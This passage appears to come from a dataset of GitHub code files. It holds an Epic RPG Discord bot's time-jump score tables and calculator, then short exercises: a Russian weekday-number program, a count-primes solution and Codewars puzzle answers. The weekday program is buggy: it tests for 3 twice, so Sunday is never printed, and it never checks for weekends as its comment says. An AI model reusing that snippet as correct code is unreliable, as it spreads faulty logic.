{emojis.SWORD_APPLE} Apple Sword = 2 score\\n'\n f'{emojis.BP} {emojis.ARMOR_EYE} Eye Armor = 2 score\\n'\n f'{emojis.BP} {emojis.SWORD_ZOMBIE} Zombie Sword = 2.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_BANANA} Banana Armor = 2.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_RUBY} Ruby Sword = 3 score\\n'\n f'{emojis.BP} {emojis.ARMOR_EPIC} Epic Armor = 3 score\\n'\n )\n gear_advanced = (\n f'{emojis.BP} {emojis.SWORD_UNICORN} Unicorn Sword = 3.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_RUBY} Ruby Armor = 3.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_HAIR} Hair Sword = 4 score\\n'\n f'{emojis.BP} {emojis.ARMOR_COIN} Coin Armor = 4 score\\n'\n f'{emojis.BP} {emojis.SWORD_COIN} Coin Sword = 4.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_MERMAID} Mermaid Armor = 4.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_ELECTRONICAL} Electronical Sword = 5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_ELECTRONICAL} Electronical Armor = 5 score\\n'\n f'{emojis.BP} {emojis.SWORD_EDGY} EDGY Sword = 5.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_EDGY} EDGY Armor = 5.5 score\\n'\n )\n gear_forged = (\n f'{emojis.BP} {emojis.SWORD_ULTRAEDGY} ULTRA-EDGY Sword = 6 score\\n'\n f'{emojis.BP} {emojis.ARMOR_ULTRAEDGY} ULTRA-EDGY Armor = 6 score\\n'\n f'{emojis.BP} {emojis.SWORD_OMEGA} OMEGA Sword = 6.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_OMEGA} OMEGA Armor = 6.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_ULTRAOMEGA} ULTRA-OMEGA Sword = 7 score\\n'\n f'{emojis.BP} {emojis.ARMOR_ULTRAOMEGA} ULTRA-OMEGA Armor = 7 score\\n'\n f'{emojis.BP} {emojis.SWORD_GODLY} GODLY Sword = 7.5 score\\n'\n )\n gear_tryhard = (\n f'{emojis.BP} {emojis.SWORD_BANANA} Banana Sword = 8 score\\n'\n f'{emojis.BP} {emojis.ARMOR_SCALED} Scaled Armor = 8 score\\n'\n f'{emojis.BP} {emojis.SWORD_SCALED} Scaled Sword = 8.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_WATERMELON} Watermelon Armor = 8.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_WATERMELON} Watermelon Sword = 9 score\\n'\n f'{emojis.BP} {emojis.ARMOR_SUPER} Super Armor = 9 score\\n'\n f'{emojis.BP} {emojis.SWORD_EPIC} Epic Sword = 9.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_LOOTBOX} Lootbox Armor = 9.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_LOTTERY} Lottery Sword = 10 score\\n'\n f'{emojis.BP} {emojis.ARMOR_WOODEN} Wooden Armor = 10 score\\n'\n )\n gear_void = (\n f'{emojis.BP} {emojis.SWORD_VOID} VOID Sword = 10.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_VOID} VOID Armor = 10.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_ABYSS} ABYSS Sword = 11 score\\n'\n f'{emojis.BP} {emojis.ARMOR_ABYSS} ABYSS Armor = 11 score\\n'\n f'{emojis.BP} {emojis.SWORD_CORRUPTED} CORRUPTED Sword = 11.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_CORRUPTED} CORRUPTED Armor = 11.5 score\\n'\n f'{emojis.BP} {emojis.SWORD_SPACE} SPACE Sword = 12 score\\n'\n f'{emojis.BP} {emojis.ARMOR_SPACE} SPACE Armor = 12 score\\n'\n f'{emojis.BP} {emojis.SWORD_TIME} TIME Sword = 12.5 score\\n'\n f'{emojis.BP} {emojis.ARMOR_TIME} TIME Armor = 12.5 score\\n'\n )\n calculation = (\n f'{emojis.BP} Both scores are added and **not** rounded\\n'\n )\n note = (\n f'{emojis.BP} These scores do **not** include AT and DEF of the gear!\\n'\n f'{emojis.DETAIL} Stats are calculated seperately by the game\\n'\n f'{emojis.DETAIL} See topic `Stats & enchants` for details\\n'\n f'{emojis.BP} Gear not listed here doesn\\'t have a known value yet\\n'\n )\n calculator = (\n f'{emojis.BP} Use {strings.SLASH_COMMANDS_GUIDE[\"time jump calculator\"]} to calculate your score'\n )\n embed = discord.Embed(\n color = settings.EMBED_COLOR,\n title = 'TIME JUMP SCORE • GEAR',\n )\n embed.add_field(name='BASIC GEAR', value=gear_basic, inline=False)\n embed.add_field(name='ADVANCED GEAR', value=gear_advanced, inline=False)\n embed.add_field(name='FORGED GEAR', value=gear_forged, inline=False)\n embed.add_field(name='TRYHARD GEAR', value=gear_tryhard, inline=False)\n embed.add_field(name='VOID GEAR', value=gear_void, inline=False)\n embed.add_field(name='HOW TO CALCULATE', value=calculation, inline=False)\n embed.add_field(name='NOTE', value=note, inline=False)\n embed.add_field(name='CALCULATOR', value=calculator, inline=False)\n return embed\n\n\nasync def embed_time_jump_calculator(area_no: int, inventory: str, profile_data: dict, boosts_data: dict,\n option_inventory: str, option_stats: str) -> discord.Embed:\n \"\"\"STT score calculator embed\"\"\"\n message_area = 'The TOP' if area_no == 21 else f'area {area_no}'\n if option_inventory == INVENTORY_CURRENT:\n calculated_area = message_area\n elif option_inventory == INVENTORY_TRADE_A15:\n calculated_area = 'area 15'\n else:\n calculated_area = 'areas 16+'\n inventory = inventory.lower()\n fish = await functions.inventory_get(inventory, 'normie fish')\n fishgolden = await functions.inventory_get(inventory, 'golden fish')\n fishepic = await functions.inventory_get(inventory, 'epic fish')\n fishsuper = await functions.inventory_get(inventory, 'super fish')\n log = await functions.inventory_get(inventory, 'wooden log')\n logepic = await functions.inventory_get(inventory, 'epic log')\n logsuper = await functions.inventory_get(inventory, 'super log')\n logmega = await functions.inventory_get(inventory, 'mega log')\n loghyper = await functions.inventory_get(inventory, 'hyper log')\n logultra = await functions.inventory_get(inventory, 'ultra log')\n logultimate = await functions.inventory_get(inventory, 'ultimate log')\n apple = await functions.inventory_get(inventory, 'apple')\n banana = await functions.inventory_get(inventory, 'banana')\n watermelon = await functions.inventory_get(inventory, 'watermelon')\n ruby = await functions.inventory_get(inventory, 'ruby')\n wolfskin = await functions.inventory_get(inventory, 'wolf skin')\n zombieeye = await functions.inventory_get(inventory, 'zombie eye')\n unicornhorn = await functions.inventory_get(inventory, 'unicorn horn')\n mermaidhair = await functions.inventory_get(inventory, 'mermaid hair')\n chip = await functions.inventory_get(inventory, 'chip')\n dragonscale = await functions.inventory_get(inventory, 'dragon scale')\n darkenergy = await functions.inventory_get(inventory, 'dark energy')\n lbcommon = await functions.inventory_get(inventory, 'common lootbox')\n lbuncommon = await functions.inventory_get(inventory, 'uncommon lootbox')\n lbrare = await functions.inventory_get(inventory, 'rare lootbox')\n lbepic = await functions.inventory_get(inventory, 'epic lootbox')\n lbedgy = await functions.inventory_get(inventory, 'edgy lootbox')\n lbomega = await functions.inventory_get(inventory, 'omega lootbox')\n lbgodly = await functions.inventory_get(inventory, 'godly lootbox')\n lbvoid = await functions.inventory_get(inventory, 'void lootbox')\n lifepotion = await functions.inventory_get(inventory, 'life potion')\n potato = await functions.inventory_get(inventory, 'potato')\n carrot = await functions.inventory_get(inventory, 'carrot')\n bread = await functions.inventory_get(inventory, 'bread')\n seed = await functions.inventory_get(inventory, 'seed')\n seed_bread = await functions.inventory_get(inventory, 'bread seed')\n seed_carrot = await functions.inventory_get(inventory, 'carrot seed')\n seed_potato = await functions.inventory_get(inventory, 'potato seed')\n lottery_ticket = await functions.inventory_get(inventory, 'lottery ticket')\n\n score_lbcommon = lbcommon * 0.05\n score_lbuncommon = lbuncommon * 0.1\n score_lbrare = lbrare * (0.4 / 3)\n score_lbepic = lbepic * 0.2\n score_lbedgy = lbedgy * 0.25\n score_lbomega = lbomega * 5\n score_lbgodly = lbgodly * 50\n score_lbvoid = lbvoid * 200\n score_lootboxes = (\n score_lbcommon + score_lbuncommon + score_lbrare + score_lbepic + score_lbedgy + score_lbomega + score_lbgodly\n + score_lbvoid\n )\n score_bread = bread / 25\n score_carrot = carrot / 30\n score_potato = potato / 35\n score_seed = seed / 2500\n score_seed_bread = seed_bread\n score_seed_carrot = seed_carrot\n score_seed_potato = seed_potato\n score_farm_items = (\n score_bread + score_carrot + score_potato + score_seed + score_seed_bread + score_seed_potato + score_seed_carrot\n )\n score_total_lootboxes_farm_items = score_lootboxes + score_farm_items\n score_wolfskin = wolfskin / 20\n score_zombieeye = zombieeye / 10\n score_unicornhorn = unicornhorn / (20 / 3)\n score_mermaidhair = mermaidhair / 5\n score_chip = chip / 4\n score_dragonscale = dragonscale / 2\n score_darkenergy = darkenergy * 0.75\n score_total_mobdrops = (\n score_wolfskin + score_zombieeye + score_unicornhorn + score_mermaidhair + score_chip + score_dragonscale\n + score_darkenergy\n )\n score_logultimate = logultimate * 40\n score_fishsuper = fishsuper * 8\n score_watermelon = watermelon / 12\n score_lifepotion = lifepotion / 500_000\n score_lottery = lottery_ticket / 2\n score_total_other = score_lottery + score_lifepotion\n score_total = floor(score_total_lootboxes_farm_items) + floor(score_total_mobdrops) + ceil(score_lottery) + ceil(score_lifepotion)\n\n field_lootboxes = (\n f'{emojis.BP} {lbcommon:,} {emojis.LB_COMMON} = {score_lbcommon:,.2f}\\n'\n f'{emojis.BP} {lbuncommon:,} {emojis.LB_UNCOMMON} = {score_lbuncommon:,.2f}\\n'\n f'{emojis.BP} {lbrare:,} {emojis.LB_RARE} = {score_lbrare:,.2f}\\n'\n f'{emojis.BP} {lbepic:,} {emojis.LB_EPIC} = {score_lbepic:,.2f}\\n'\n f'{emojis.BP} {lbedgy:,} {emojis.LB_EDGY} = {score_lbedgy:,.2f}\\n'\n f'{emojis.BP} {lbomega:,} {emojis.LB_OMEGA} = {score_lbomega:,.2f}\\n'\n f'{emojis.BP} {lbgodly:,} {emojis.LB_GODLY} = {score_lbgodly:,.2f}\\n'\n f'{emojis.BP} {lbvoid:,} {emojis.LB_VOID} = {score_lbvoid:,.2f}\\n'\n f'{emojis.BP} Total: **{score_lootboxes:,.2f}**\\n'\n )\n field_mobdrops = (\n f'{emojis.BP} {wolfskin:,} {emojis.WOLF_SKIN} = {score_wolfskin:,.2f}\\n'\n f'{emojis.BP} {zombieeye:,} {emojis.ZOMBIE_EYE} = {score_zombieeye:,.2f}\\n'\n f'{emojis.BP} {unicornhorn:,} {emojis.UNICORN_HORN} = {score_unicornhorn:,.2f}\\n'\n f'{emojis.BP} {mermaidhair:,} {emojis.MERMAID_HAIR} = {score_mermaidhair:,.2f}\\n'\n f'{emojis.BP} {chip:,} {emojis.CHIP} = {score_chip:,.2f}\\n'\n f'{emojis.BP} {dragonscale:,} {emojis.DRAGON_SCALE} = {score_dragonscale:,.2f}\\n'\n f'{emojis.BP} {darkenergy:,} {emojis.DARK_ENERGY} = {score_darkenergy:,.2f}\\n'\n f'{emojis.BP} Total: **{score_total_mobdrops:,.2f}**\\n'\n )\n field_farming = (\n f'{emojis.BP} {bread:,} {emojis.BREAD} = {score_bread:,.2f}\\n'\n f'{emojis.BP} {carrot:,} {emojis.CARROT} = {score_carrot:,.2f}\\n'\n f'{emojis.BP} {potato:,} {emojis.POTATO} = {score_potato:,.2f}\\n'\n f'{emojis.BP} {seed:,} {emojis.SEED} = {score_seed:,.2f}\\n'\n f'{emojis.BP} {seed_bread:,} {emojis.SEED_BREAD} = {score_seed_bread:,.2f}\\n'\n f'{emojis.BP} {seed_carrot:,} {emojis.SEED_CARROT} = {score_seed_carrot:,.2f}\\n'\n f'{emojis.BP} {seed_potato:,} {emojis.SEED_POTATO} = {score_seed_potato:,.2f}\\n'\n f'{emojis.BP} Total: **{score_farm_items:,.2f}**\\n'\n )\n embed = discord.Embed(\n color=settings.EMBED_COLOR,\n title='TIME JUMP SCORE CALCULATOR',\n description = (\n f'{emojis.BP} Your current area: **{message_area.capitalize()}**\\n'\n f'{emojis.BP} Inventory mode: **{option_inventory}**\\n'\n f'{emojis.BP} Stats mode: **{option_stats}**'\n ),\n )\n embed.add_field(name='LOOTBOXES', value=field_lootboxes, inline=True)\n embed.add_field(name='FARM ITEMS', value=field_farming, inline=True)\n embed.add_field(name='MOB DROPS', value=field_mobdrops, inline=True)\n\n if option_inventory in (INVENTORY_TRADE_A15, INVENTORY_TRADE_A16):\n areas = await database.get_all_areas()\n all_areas = {}\n for area in areas:\n all_areas[area.area_no] = area\n current_area = all_areas[area_no]\n\n loghyper = loghyper + (logultra * 8)\n logmega = logmega + (loghyper * 8)\n logsuper = logsuper + (logmega * 8)\n logepic = logepic + (logsuper * 8)\n log = log + (logepic * 20)\n fishgolden = fishgolden + (fishepic * 80)\n fish = fish + (fishgolden * 12)\n apple = apple + (banana * 12)\n\n original_area = area_no\n areas_best_changes = []\n\n # Get the amount of logs for the current area\n log = log + (fish * current_area.trade_fish_log)\n if not current_area.trade_apple_log == 0:\n log = log + (apple * current_area.trade_apple_log)\n apple = 0\n if not current_area.trade_ruby_log == 0:\n log = log + (ruby * current_area.trade_ruby_log)\n ruby = 0\n\n # Calculate the best trade rate for all areas\n for area in areas:\n area_no_next = area.area_no + 1\n if area_no_next != len(areas)+1:\n area_next = all_areas[area_no_next]\n else:\n area_next = None\n if area_next is not None:\n fish_rate_next = area_next.trade_fish_log\n apple_rate_next = area_next.trade_apple_log\n ruby_rate_next = area_next.trade_ruby_log\n if area.trade_fish_log != 0:\n fish_rate_change = fish_rate_next / area.trade_fish_log\n else:\n fish_rate_change = 0\n if area.trade_apple_log != 0:\n apple_rate_change = apple_rate_next / area.trade_apple_log\n else:\n apple_rate_change = 0\n if area.trade_ruby_log != 0:\n ruby_rate_change = ruby_rate_next / area.trade_ruby_log\n else:\n ruby_rate_change = 0\n else:\n fish_rate_change = 1\n apple_rate_change = 1\n ruby_rate_change = 1\n if (fish_rate_change <= 1) and (apple_rate_change <= 1) and (ruby_rate_change <= 1):\n best_change_index = 3\n else:\n all_changes = [fish_rate_change, apple_rate_change, ruby_rate_change]\n best_change = max(all_changes)\n best_change_index = all_changes.index(best_change)\n areas_best_changes.append(\n [area.area_no, best_change_index, area.trade_fish_log, area.trade_apple_log, area.trade_ruby_log]\n )\n if area_next is None: break\n\n # Get the amount of logs in each area\n areas_log_amounts = []\n trade_fish_rate_next = None\n trade_apple_rate_next = None\n trade_ruby_rate_next = None\n for best_change in areas_best_changes[original_area-1:]:\n trade_area = best_change[0]\n trade_best_change = best_change[1]\n trade_fish_rate = best_change[2]\n trade_apple_rate = best_change[3]\n trade_ruby_rate = best_change[4]\n if not trade_area == len(areas_best_changes):\n next_area = areas_best_changes[trade_area]\n trade_fish_rate_next = next_area[2]\n trade_apple_rate_next = next_area[3]\n trade_ruby_rate_next = next_area[4]\n\n if not (trade_apple_rate_next == 0) and not (apple == 0):\n log = log + (apple * trade_apple_rate_next)\n apple = 0\n if not (trade_ruby_rate_next == 0) and not (ruby == 0):\n log = log + (ruby * trade_ruby_rate_next)\n ruby = 0\n\n if trade_area == original_area:\n areas_log_amounts.append([trade_area, log, trade_ruby_rate])\n\n if trade_best_change == 0:\n log = log / trade_fish_rate\n log = log * trade_fish_rate_next\n elif trade_best_change == 1:\n log = log / trade_apple_rate\n log = log * trade_apple_rate_next\n elif trade_best_change == 2:\n log = log / trade_ruby_rate\n log = log * trade_ruby_rate_next\n\n if not trade_area == len(areas_best_changes):\n areas_log_amounts.append([trade_area+1, log, trade_ruby_rate_next])\n\n a15 = a16 = (0,0,0)\n for log_amount in areas_log_amounts:\n if log_amount[0] == 15:\n a15 = log_amount\n elif log_amount[0] == 21:\n a16 = log_amount\n log_a15 = a15[1]\n ruby_rate_a15 = a15[2]\n try:\n ruby_a15 = floor(log_a15 / ruby_rate_a15)\n except ZeroDivisionError:\n ruby_a15 = 0\n log_a16 = a16[1]\n ruby_rate_a16 = a16[2]\n ruby_a16 = floor(log_a16 / ruby_rate_a16)\n\n if option_inventory == INVENTORY_TRADE_A15:\n ruby_str = f'{ruby_a15:,}' if ruby_a15 != 0 else 'N/A'\n score_ruby = ruby_a15 / 25\n else:\n ruby_str = f'{ruby_a16:,}'\n score_ruby = ruby_a16 / 25\n score_total_materials = score_ruby + score_logultimate + score_fishsuper + score_watermelon\n score_total += floor(score_total_materials)\n\n field_materials = (\n f'{emojis.BP} {ruby_str} {emojis.RUBY} = {score_ruby:,.2f}\\n'\n f'{emojis.BP} {logultimate:,} {emojis.LOG_ULTIMATE} = {score_logultimate:,.2f}\\n'\n f'{emojis.BP} {fishsuper:,} {emojis.FISH_SUPER} = {score_fishsuper:,.2f}\\n'\n f'{emojis.BP} {watermelon:,} {emojis.WATERMELON} = {score_watermelon:,.2f}\\n'\n f'{emojis.BP} Total: **{score_total_materials:,.2f}**\\n'\n )\n field_other = (\n f'{emojis.BP} {lifepotion:,} {emojis.LIFE_POTION} = {score_lifepotion:,.2f}\\n'\n f'{emojis.BP} {lottery_ticket} {emojis.LOTTERY_TICKET} = {score_lottery:,.2f}\\n'\n f'{emojis.BP} Total: **{score_total_other:,.2f}**\\n'\n )\n notes = (\n f'{emojis.BP} This calculation assumes that you trade **all** of your materials to rubies\\n'\n f'{emojis.BP} Materials you may still need for crafting gear are not subtracted'\n )\n embed.add_field(name='MATERIALS', value=field_materials, inline=True)\n embed.add_field(name='OTHER', value=field_other, inline=True)\n\n\n if option_inventory == INVENTORY_CURRENT:\n score_log = log / 25_000\n score_logepic = logepic / 2_500\n score_logsuper = logsuper / 250\n score_logmega = logmega / 25\n score_loghyper = loghyper / 2.5\n score_logultra = logultra * 4\n score_ruby = ruby / 25\n score_total_materials_1 = (\n score_log + score_logepic + score_logsuper + score_logmega + score_loghyper + score_logultra\n + score_logultimate + score_ruby\n )\n score_fish = fish / 25_000\n score_fishgolden = fishgolden / 1_250\n score_fishepic = fishepic / 12.5\n score_apple = apple / 5_000\n score_banana = banana / 250\n score_total_materials_2 = (\n score_fish + score_fishgolden + score_fishepic + score_fishsuper + score_apple + score_banana\n + score_watermelon\n )\n score_total_materials = score_total_materials_1 + score_total_materials_2\n score_total_other = score_lifepotion + score_lottery\n score_total += floor(score_total_materials)\n\n field_materials_1 = (\n f'{emojis.BP} {log:,} {emojis.LOG} = {score_log:,.2f}\\n'\n f'{emojis.BP} {logepic:,} {emojis.LOG_EPIC} = {score_logepic:,.2f}\\n'\n f'{emojis.BP} {logsuper:,} {emojis.LOG_SUPER} = {score_logsuper:,.2f}\\n'\n f'{emojis.BP} {logmega:,} {emojis.LOG_MEGA} = {score_logmega:,.2f}\\n'\n f'{emojis.BP} {loghyper:,} {emojis.LOG_HYPER} = {score_loghyper:,.2f}\\n'\n f'{emojis.BP} {logultra:,} {emojis.LOG_ULTRA} = {score_logultra:,.2f}\\n'\n f'{emojis.BP} {logultimate:,} {emojis.LOG_ULTIMATE} = {score_logultimate:,.2f}\\n'\n f'{emojis.BP} {ruby:,} {emojis.RUBY} = {score_ruby:,.2f}\\n'\n f'{emojis.BP} Total: **{score_total_materials_1:,.2f}**\\n'\n )\n field_materials_2 = (\n f'{emojis.BP} {fish:,} {emojis.FISH} = {score_fish:,.2f}\\n'\n f'{emojis.BP} {fishgolden:,} {emojis.FISH_GOLDEN} = {score_fishgolden:,.2f}\\n'\n f'{emojis.BP} {fishepic:,} {emojis.FISH_EPIC} = {score_fishepic:,.2f}\\n'\n f'{emojis.BP} {fishsuper:,} {emojis.FISH_SUPER} = {score_fishsuper:,.2f}\\n'\n f'{emojis.BP} {apple:,} {emojis.APPLE} = {score_apple:,.2f}\\n'\n f'{emojis.BP} {banana:,} {emojis.BANANA} = {score_banana:,.2f}\\n'\n f'{emojis.BP} {watermelon:,} {emojis.WATERMELON} = {score_watermelon:,.2f}\\n'\n f'{emojis.BP} Total: **{score_total_materials_2:,.2f}**\\n'\n )\n field_other = (\n f'{emojis.BP} {lifepotion:,} {emojis.LIFE_POTION} = {score_lifepotion:,.2f}\\n'\n f'{emojis.BP} {lottery_ticket} {emojis.LOTTERY_TICKET} = {score_lottery:,.2f}\\n'\n f'{emojis.BP} Total: **{score_total_other:,.2f}**\\n'\n )\n notes = (\n f'{emojis.BP} This calculation shows your inventory as is\\n'\n f'{emojis.BP} Materials you may still need for crafting gear are not subtracted'\n )\n embed.add_field(name='MATERIALS (I)', value=field_materials_1, inline=True)\n embed.add_field(name='MATERIALS (II)', value=field_materials_2, inline=True)\n embed.add_field(name='OTHER', value=field_other, inline=True)\n\n if option_stats in (STATS_CURRENT, STATS_MANUAL):\n enchant_multipliers = {\n 'normie': 0.05,\n 'good': 0.15,\n 'great': 0.25,\n 'mega': 0.4,\n 'epic': 0.6,\n 'hyper': 0.7,\n 'ultimate': 0.8,\n 'perfect': 0.9,\n 'edgy': 0.95,\n 'ultra-edgy': 1,\n 'omega': 1.25,\n 'ultra-omega': 1.5,\n 'godly': 2,\n 'void': 3,\n }\n armor_enchant_multiplier = enchant_multipliers.get(profile_data['enchant_armor'].lower(), 0)\n sword_enchant_multiplier = enchant_multipliers.get(profile_data['enchant_sword'].lower(), 0)\n score_sword_enchant = sword_enchant_multiplier * 4\n score_armor_enchant = armor_enchant_multiplier * 4\n score_enchants = score_armor_enchant + score_sword_enchant\n\n if option_stats == STATS_CURRENT:\n at_multiplier = def_multiplier = life_multiplier = 1\n if profile_data['horse_type'] in ('magic', 'strong', 'defender', 'tank'):\n horse_data: database.Horse = await database.get_horse(profile_data['horse_tier'])\n horse_epicness_type_factor = 1 + profile_data['horse_epicness'] * 0.005\n if profile_data['horse_type'] == 'magic':\n horse_boost = horse_data.magic_level_bonus * profile_data['horse_level'] * horse_epicness_type_factor\n armor_enchant_multiplier *= 1 + horse_boost / 100\n sword_enchant_multiplier *= 1 + horse_boost / 100\n if profile_data['horse_type'] == 'strong':\n horse_boost = horse_data.strong_level_bonus * profile_data['horse_level'] * horse_epicness_type_factor\n at_multiplier += horse_boost / 100\n if profile_data['horse_type'] == 'defender':\n horse_boost = horse_data.def_level_bonus * profile_data['horse_level'] * horse_epicness_type_factor\n def_multiplier += horse_boost / 100\n if profile_data['horse_type'] == 'tank':\n horse_boost = horse_data.tank_level_bonus * profile_data['horse_level'] * horse_epicness_type_factor\n life_multiplier += horse_boost / 100\n base_at = functions.round_school(profile_data['at'] / (1 + sword_enchant_multiplier) / at_multiplier) - boosts_data['at']\n base_def = functions.round_school(profile_data['def'] / (1 + armor_enchant_multiplier) / def_multiplier) - boosts_data['def']\n base_life = functions.round_school(profile_data['life'] / life_multiplier) - boosts_data['life']\n else:\n sword_at = profile_data['sword'].stat_at if profile_data['sword'] is not None else 0\n armor_def = profile_data['armor'].stat_def if profile_data['armor'] is not None else 0\n base_at = profile_data['level'] + sword_at + profile_data['extra_at']\n base_def = profile_data['level'] + armor_def + profile_data['extra_def']\n base_life = 95 + (5 * profile_data['level']) + profile_data['extra_life']\n score_level = profile_data['level'] * 0.5\n score_at = base_at * 0.125\n score_def = base_def * 0.15\n score_life = base_life * (1 / 40)\n score_total_stats = score_at + score_def + score_life + score_level\n score_total += ceil(score_total_stats)\n field_stats = (\n f'{emojis.BP} {profile_data[\"level\"]:,} {emojis.STAT_LEVEL} = {score_level:,.2f}\\n'\n f'{emojis.BP} {base_at:,} {emojis.STAT_AT} = {score_at:,.2f}\\n'\n f'{emojis.BP} {base_def:,} {emojis.STAT_DEF} = {score_def:,.2f}\\n'\n f'{emojis.BP} {base_life:,} {emojis.STAT_LIFE} = {score_life:,.2f}\\n'\n f'{emojis.BP} Total: **{score_total_stats:,.2f}**\\n'\n )\n if profile_data['sword'] is not None:\n sword_item = profile_data['sword']\n sword = f'{sword_item.emoji} {sword_item.name} = {sword_item.score:,.2f}'\n score_sword = sword_item.score\n else:\n sword = 'No or unknown sword = 0.00'\n score_sword = 0\n if profile_data['armor'] is not None:\n armor_item = profile_data['armor']\n armor = f'{armor_item.emoji} {armor_item.name} = {armor_item.score:,.2f}'\n score_armor = armor_item.score\n else:\n armor = 'No or unknown armor = 0.00'\n score_armor = 0\n score_total_gear = score_enchants + score_armor + score_sword\n score_total += ceil(score_enchants) + score_armor + score_sword\n field_gear = (\n f'{emojis.BP} {sword}\\n'\n f'{emojis.DETAIL} {emojis.PR_ENCHANTER} {profile_data[\"enchant_sword\"]} enchant = '\n f'{score_sword_enchant:,.2f}\\n'\n f'{emojis.BP} {armor}\\n'\n f'{emojis.DETAIL} {emojis.PR_ENCHANTER} {profile_data[\"enchant_armor\"]} enchant = '\n f'{score_armor_enchant:,.2f}\\n'\n f'{emojis.BP} Total: **{score_total_gear:,.2f}**\\n'\n )\n score_total += 8 # Unknown base score coming from wherever\n notes = (\n f'{notes}\\n'\n f'{emojis.BP} This calculation shows an approximation of your full score\\n'\n f'{emojis.DETAIL} This might not always be 100% accurate!\\n'\n f'{emojis.DETAIL} An active quest adds 1 score which is not listed here'\n )\n embed.add_field(name='BASE STATS', value=field_stats, inline=True)\n embed.add_field(name='GEAR & ENCHANTS', value=field_gear, inline=True)\n\n field_totals = (\n f'{emojis.BP} Lootboxes & farm items: {score_total_lootboxes_farm_items:,.2f} ➜ {floor(score_total_lootboxes_farm_items)}\\n'\n f'{emojis.BP} Mob drops: {score_total_mobdrops:,.2f} ➜ {floor(score_total_mobdrops)}\\n'\n f'{emojis.BP} Materials: {score_total_materials:,.2f} ➜ {floor(score_total_materials)}\\n'\n f'{emojis.BP} Life potions: {score_lifepotion:,.2f} ➜ {ceil(score_lifepotion)}\\n'\n f'{emojis.BP} Lottery tickets: {score_lottery:,.2f} ➜ {ceil(score_lottery)}'\n )\n if option_stats in (STATS_CURRENT, STATS_MANUAL):\n field_totals = (\n f'{emojis.BP} Base score: 8\\n'\n f'{field_totals}\\n'\n f'{emojis.BP} Stats: {score_total_stats:,.2f} ➜ {ceil(score_total_stats)}\\n'\n f'{emojis.BP} Gear: {score_armor + score_sword:,.2f} ➜ {score_armor + score_sword:g}\\n'\n f'{emojis.BP} Enchants: {score_enchants:,.2f} ➜ {ceil(score_enchants)}'\n )\n field_totals = (\n f'{field_totals}\\n'\n f'{emojis.BP} Total score {calculated_area}: **{score_total:,g}**\\n'\n )\n embed.description = (\n f'{embed.description}\\n'\n f'{emojis.BP} Total score: **{score_total:,g}**\\n'\n )\n embed.add_field(name='TOTALS', value=field_totals, inline=False)\n embed.add_field(name='NOTE', value=notes, inline=False)\n\n return embed","repo_name":"Miriel-py/Epic-RPG-Guide","sub_path":"content/timetravel.py","file_name":"timetravel.py","file_ext":"py","file_size_in_byte":61318,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"32080286923","text":"# Напишите программу, которая принимает на вход цифру,\n# обозначающую день недели, и проверяет, является ли этот день выходным.\n\na = input('Введите число: ')\n\ndef day_of_week(a):\n if a == 1:\n print('Понедельник')\n elif a == 2:\n print('Вторник')\n elif a == 3:\n print('Среда')\n elif a == 4:\n print('Четверг')\n elif a == 5:\n print('Пятница')\n elif a == 6:\n print('Суббота')\n elif a == 3:\n print('Воскресенье')\n return a\n\nif a.isdigit():\n day_of_week(int(a))\nelse:\n print('Введено неверное значение')\n\n","repo_name":"CaballeroSabio/PythonSeminars","sub_path":"lesson01/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32600629860","text":"# https://leetcode.com/problems/count-primes/\n# O(n sqrt(n)), O(n)\n\nclass Solution:\n def countPrimes(self, n: int) -> int:\n if n < 2: \n return 0\n prime = [1] * n\n prime[0] = 0\n prime[1] = 0\n \n for i in range(2, int(sqrt(n))+1):\n if prime[i]:\n # Set all multiples of the integer to not prime\n prime[i * i: n: i] = [0] * len(prime[i * i: n: i])\n return sum(prime)\n","repo_name":"NoahTN/epi-workbook","sub_path":"5_arrays/5.9_count_primes.py","file_name":"5.9_count_primes.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38629560085","text":"# my solution \ndirections = {\"NORTH\": \"SOUTH\", \"SOUTH\": \"NORTH\", \"EAST\": \"WEST\", \"WEST\": \"EAST\"}\ndef dirReduc(arr):\n i = 0\n while i < len(arr)-1:\n current_item = arr[i]\n if arr[i+1] == directions[current_item]:\n arr.pop(i)\n arr.pop(i)\n i = 0\n else:\n i+=1\n return arr\n\na = [\"NORTH\", \"SOUTH\", \"SOUTH\", \"EAST\", \"WEST\", \"NORTH\", \"WEST\"]\nassert dirReduc(a) == [\"WEST\"]\n\n\n# clever solution Python Recursion\ndef dirReduc(arr):\n dir = \" \".join(arr)\n dir2 = dir.replace(\"NORTH SOUTH\",'').replace(\"SOUTH NORTH\",'').replace(\"EAST WEST\",'').replace(\"WEST EAST\",'')\n dir3 = dir2.split()\n return dirReduc(dir3) if len(dir3) < len(arr) else dir3\n\n# https://www.codewars.com/kata/58223370aef9fc03fd000071/train/python\ndef dashatize(n):\n print(n)\n if not isinstance(n, int): return 'None'\n if n < 0: n = abs(n)\n arr =[]\n for i in str(n):\n if int(i) % 2 == 0:\n arr.append(i)\n else:\n arr.append(\"-{}-\".format(i))\n return 